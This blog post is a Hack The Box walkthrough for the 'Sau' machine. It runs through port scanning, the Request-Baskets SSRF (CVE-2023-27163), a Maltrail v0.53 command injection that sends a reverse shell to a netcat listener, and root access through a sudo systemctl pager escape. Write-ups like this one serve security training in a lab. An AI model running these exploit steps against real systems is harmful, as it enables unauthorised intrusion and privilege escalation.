Post

HTB - Sau

Overview

MachineSau
RankEasy
Time1h26m
FocusSSRF, command-injection

1. Information Gathering

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# TCP SYN all ports scanning
sudo nmap -sS -sC -sV -O -Pn --min-rate 10000 -p- sau

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
55555/tcp open  unknown
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Mon, 04 Dec 2023 13:59:49 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Mon, 04 Dec 2023 13:59:22 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Mon, 04 Dec 2023 13:59:22 GMT
|_    Content-Length: 0

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2. Initial Foothold

Request Baskets is a web service designed to capture arbitrary HTTP requests and facilitate their inspection through either a RESTful API or a straightforward web user interface.

CVE-2023-27163 represents a critical Server-Side Request Forgery (SSRF) vulnerability that was identified in Request-Baskets, affecting all versions up to and including 1.2.1. This particular vulnerability grants malicious actors the ability to gain unauthorized access to network resources and sensitive information by exploiting the /api/baskets/{name} component through carefully crafted API requests.

As previously mentioned, Request-Baskets operates as a web application designed to collect and log incoming HTTP requests directed to specific endpoints known as “baskets.” During the creation of these baskets, users have the flexibility to specify alternative servers to which these requests should be forwarded. The critical issue here lies in the fact that users can inadvertently specify services they shouldn’t have access to, including those typically restricted within a network environment.

For example, consider a scenario where the server hosts Request-Baskets on port 55555 and simultaneously runs a Flask web server on port 8000. The Flask server, however, is configured to exclusively interact with the localhost. In this context, an attacker can exploit the SSRF vulnerability by creating a basket that forwards requests to http://localhost:8000, effectively bypassing the previous network restrictions and gaining access to the Flask web server, which should have been restricted to local access only.

PoC of SSRF on Request-Baskets (CVE-2023-27163)

1
2
3
4
5
6
7
8
# enumerating internal webserver
 ./CVE-2023-27163.sh http://sau:55555 http://localhost:80
Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163

> Creating the "kwpjxa" proxy basket...
> Basket created!
> Accessing http://sau:55555/kwpjxa now makes the server request to http://localhost:80.
> Authorization: TOXDrjpjR4bfvkkSGah34Nvu3r8L7pv3mV3ECGG_IacT

Maltrail-v0.53-Exploit - Command Injection Vulnerability

1
2
3
# running maltrail PoC through request-baskets
python3 exploit.py 10.10.14.4 4444 http://sau:55555/kwpjxa
Running exploit on http://sau:55555/kwpjxa/login
1
2
3
4
5
# catching a shell
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.224] 33162
$
1
2
3
# user flag
puma@sau:~$ cat ~/user.txt
cat ~/user.txt

3. Privilege Escalation

1
2
3
4
5
6
7
8
9
# checking perms
puma@sau:~$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

sudo systemctl status [service] privilege escalation.

1
2
3
4
5
6
7
puma@sau:/opt/maltrail$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)!sh
!sshh!sh
# cat /root/root.txt
cat /root/root.txt
Machine pwned
This post is licensed under CC BY 4.0 by the author.